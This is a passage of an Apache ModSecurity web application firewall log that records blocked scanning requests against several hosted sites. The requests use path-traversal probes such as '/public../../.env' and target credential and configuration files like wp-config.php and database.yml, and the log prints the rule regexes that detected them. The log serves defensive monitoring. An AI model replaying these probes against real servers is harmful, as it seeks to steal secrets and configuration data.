"agKpxvaAnTZtx1_H_wzGlQAAAUU"]
[Tue May 12 06:17:10.317779 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/settings.py"] [unique_id "agKpxvaAnTZtx1_H_wzGlQAAAUU"]
[Tue May 12 06:17:10.783585 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpxvaAnTZtx1_H_wzGlQAAAUU"]
[Tue May 12 06:17:10.809128 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKpxvaAnTZtx1_H_wzGlgAAAUU"]
[Tue May 12 06:17:10.809366 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKpxvaAnTZtx1_H_wzGlgAAAUU"]
[Tue May 12 06:17:11.282988 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpxvaAnTZtx1_H_wzGlgAAAUU"]
[Tue May 12 06:17:11.308601 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpx_aAnTZtx1_H_wzGlwAAAUU"]
[Tue May 12 06:17:11.308676 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpx_aAnTZtx1_H_wzGlwAAAUU"]
[Tue May 12 06:17:11.308840 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpx_aAnTZtx1_H_wzGlwAAAUU"]
[Tue May 12 06:17:11.762249 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpx_aAnTZtx1_H_wzGlwAAAUU"]
[Tue May 12 06:17:11.792638 2026] [core:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] AH10244: invalid URI path (/public../../../.env)
[Tue May 12 06:17:12.360671 2026] [core:error] [pid 1842385:tid 1842413] [client 45.148.10.166:39310] AH10244: invalid URI path (/public../../../../.env)
[Tue May 12 06:17:12.895849 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:39322] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpyM1tk6y7yBJLpJpFbwAAAI0"]
[Tue May 12 06:17:12.895945 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:39322] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpyM1tk6y7yBJLpJpFbwAAAI0"]
[Tue May 12 06:17:12.896114 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:39322] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpyM1tk6y7yBJLpJpFbwAAAI0"]
[Tue May 12 06:17:13.412242 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:39322] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpyM1tk6y7yBJLpJpFbwAAAI0"]
[Tue May 12 06:17:13.441160 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:39322] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpyc1tk6y7yBJLpJpFdAAAAI0"]
[Tue May 12 06:17:13.441228 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:39322] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpyc1tk6y7yBJLpJpFdAAAAI0"]
[Tue May 12 06:17:13.441381 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:39322] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpyc1tk6y7yBJLpJpFdAAAAI0"]
[Tue May 12 06:17:13.937062 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:39322] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpyc1tk6y7yBJLpJpFdAAAAI0"]
[Tue May 12 06:17:13.964663 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:39322] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKpyc1tk6y7yBJLpJpFdwAAAI0"]
[Tue May 12 06:17:13.964731 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:39322] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKpyc1tk6y7yBJLpJpFdwAAAI0"]
[Tue May 12 06:17:13.964907 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:39322] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKpyc1tk6y7yBJLpJpFdwAAAI0"]
[Tue May 12 06:17:14.459464 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:39322] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpyc1tk6y7yBJLpJpFdwAAAI0"]
[Tue May 12 06:17:14.487749 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:39322] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKpys1tk6y7yBJLpJpFewAAAI0"]
[Tue May 12 06:17:14.487974 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:39322] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKpys1tk6y7yBJLpJpFewAAAI0"]
[Tue May 12 06:17:14.949443 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:39322] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpys1tk6y7yBJLpJpFewAAAI0"]
[Tue May 12 06:17:14.977474 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:39322] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/settings.py"] [unique_id "agKpys1tk6y7yBJLpJpFfAAAAI0"]
[Tue May 12 06:17:14.977673 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:39322] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/settings.py"] [unique_id "agKpys1tk6y7yBJLpJpFfAAAAI0"]
[Tue May 12 06:17:15.436483 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:39322] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpys1tk6y7yBJLpJpFfAAAAI0"]
[Tue May 12 06:17:15.465851 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:39322] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKpy81tk6y7yBJLpJpFfgAAAI0"]
[Tue May 12 06:17:15.466069 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:39322] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKpy81tk6y7yBJLpJpFfgAAAI0"]
[Tue May 12 06:17:15.931594 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:39322] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpy81tk6y7yBJLpJpFfgAAAI0"]
[Tue May 12 06:17:19.310257 2026] [security2:error] [pid 1808852:tid 1808868] [client 123.207.65.62:51534] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.classist.fr"] [uri "/"] [unique_id "agKpzxfeipD4uoG21FpApgAAAA0"]
[Tue May 12 06:17:41.246424 2026] [security2:error] [pid 1844863:tid 1844877] [client 5.135.131.226:51838] ModSecurity: Warning. Matched phrase ".cshrc" at ARGS:edit. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .cshrc found within ARGS:edit: csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/js/lightbox/"] [unique_id "agKp5faAnTZtx1_H_wzGxQAAAUg"]
[Tue May 12 06:17:41.247165 2026] [security2:error] [pid 1844863:tid 1844877] [client 5.135.131.226:51838] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/js/lightbox/"] [unique_id "agKp5faAnTZtx1_H_wzGxQAAAUg"]
[Tue May 12 06:17:41.300863 2026] [security2:error] [pid 1844863:tid 1844877] [client 5.135.131.226:51838] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agKp5faAnTZtx1_H_wzGxQAAAUg"]
